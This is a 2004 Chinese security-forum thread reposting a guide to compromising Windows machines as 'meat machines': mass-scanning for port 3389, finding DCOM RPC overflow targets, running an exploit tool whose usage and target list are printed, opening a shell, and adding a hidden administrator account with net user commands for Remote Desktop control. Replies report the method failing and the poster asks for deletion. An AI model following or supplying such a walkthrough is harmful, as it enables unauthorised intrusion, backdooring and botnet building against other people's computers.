论坛: 菜鸟乐园 标题: 如何快速获得自己需要的肉机(转) 复制本贴地址    
作者: dfwm2008 [dfwm2008]    论坛用户   登录
记得从前看过一篇文章介绍如何快速获得3389肉机的文章,基本思路及步骤如下:
先通过superscan等扫描端口的工具扫一段开启3389端口的主机,然后导出主机列表,再由x-scan扫描NT弱口令,配置强一点的字典,稍等一会儿,得到偌多弱口令,祭起终端连接,成功连接填入用户名就可以远程登陆控制了。留后门,删日志……
  其实得到开启3389服务的主机列表后,我们完全可以利用当前危害最大的“dcomrpc漏洞”添加一个管理员帐号,再用这个帐号轻松地登陆到远程终端,达到图形化的完全控制。
  用到的工具有:superscan、x-scanV2.3、还有一个新增的x-scan的插件DComRpc.xpn,专门用来扫描存在DComRpc漏洞的机器。可以去下载,把它放到x-scan下plugin目录下。x-scan便有了扫描DComRpc漏洞的功能。当然你也可以下载专用的扫描器。不过经本人测试,这个插件还是相当好用的。还有主角远程 DCOM RPC 缓冲区溢出工具(可下载)
  要开工了。用superscan得到主机列表,save成文本文件修改为一行一个IP的格式,这个过程略过不说了。打开加入了插件的x-scan,扫描参数中选“从文件获取主机列表”,选取刚才保存的文件。在扫描模块中只选择最后一项,也就是刚加进去的插件,Dcomrpc溢出漏洞。开始扫描吧,你会发现几乎是所有的机器都存在这个好玩而简单的漏洞。现在该用xpdcomrpc了,先看一下帮助吧:
---------------------------------------------------------
- 远程 DCOM RPC 缓冲区溢出
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- EXE 文件编译及修改:sagi http://www.hackerxfiles.net
- Usage: xp <Target ID> <Target IP>
- Targets:
-    0 Windows 2000 SP0 (english)
-    1 Windows 2000 SP0 (english2)
-    2 Windows 2000 SP1 (english)
-    3 Windows 2000 SP2 (english)
-    4 Windows 2000 SP2 (english2)
-    5 Windows 2000 SP3 (english)
-    6 Windows 2000 SP3 (english2)
-    7 Windows 2000 SP3 (english3)
-    8 Windows 2000 SP4 (english)
-    9 Windows XP  SP0 (english)
-    10 Windows XP  SP1 (english)
-    11 Windows XP  SP1 (english2)
-    12 Windows XP  SP2 (english)
-    13 Windows 2000 SP3 (chinese)
-    14 Windows 2000 SP4 (chinese)
-    15 Windows XP  SP0 (chinese)
-    16 Windows XP  SP1 (chinese)
-    17 Windows 2000 SP0 (japanese)
-    18 Windows 2000 SP1 (japanese)
-    19 Windows 2000 SP2 (japanese)
-    20 Windows 2000 SP0-1  (big5)
-    21 Windows 2000 SP3  (big5)
-    22 Windows 2000 SP4  (big5)
-    23 Windows XP  SP0-1  (big5)
-    24 Windows 2000 SP0 (korean)
-    25 Windows 2000 SP1 (korean)
-    26 Windows 2000 SP2 (korean)
-    27 Windows 2000 SP4 (korean)
明白了吗?现在我们就可以这样了:
xp 13 192.168.1.*
一段提示过后,看到跳出的shell了吗?
c:\winnt\system32>
呵呵,到这一步,一切都好做了
c:\winnt\system32>net user admin hahaha /add
命令成功完成
c:\winnt\system32>net localgroup administrators admin /add
命令成功完成
好了,现在就可以用这个帐号admin进行3389远程控制了。
  这种方法比较简单吧,要比起破解nt弱口令要主动一些,在此也是提出一种思路吧。从一开始的输入法漏洞开始,3389注定不能平安,愿大家都找到自己好用的肉机吧~.
      大家可测试 看否搜寻所要的肉机      希望还能用

地主 发表时间: 04-01-12 15:04

回复: lhh2003 [lhh2003]   论坛用户   登录
晕,那我想请问xp.exe哪里有下载啊?从来也没有听说过!!!
rpc漏洞不是要135端口,再通过cndcom溢出的啊,不过我试了都不可以的溢出的(chdcom同理)
唉。。。我都试了好久,网上说有70%都可以的,都不可以的.

B1层 发表时间: 04-01-12 15:36

回复: dfwm2008 [dfwm2008]   论坛用户   登录
  看来要删贴  我还没去试过 只是看到好的转过来给大家看一下而已
  我忙 不好意思了各位   

B2层 发表时间: 04-01-12 16:10

回复: yunlaihao [yunlaihao]   论坛用户   登录
请教superscan需要什么配置!
我的 机器不好想找个肉机但是superscan不能用!
怎么办啊
机器显示  连接文件superscan4.exe
          找不存在的出去ADVAPI32。DLL:LSACLOSE。
什么意思啊?!

B3层 发表时间: 04-01-12 16:31

回复: dfwm2008 [dfwm2008]   论坛用户   登录
    强烈建议删了我这贴 
  这贴里的很多东西我都找不到
    至于SUOERCAN  它根本就连接不到 所以  删  .


B4层 发表时间: 04-01-12 19:09

回复: lhh2003 [lhh2003]   论坛用户   登录
呵呵,有心,但还是顶了!!!,嘻嘻

B5层 发表时间: 04-01-12 19:17

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号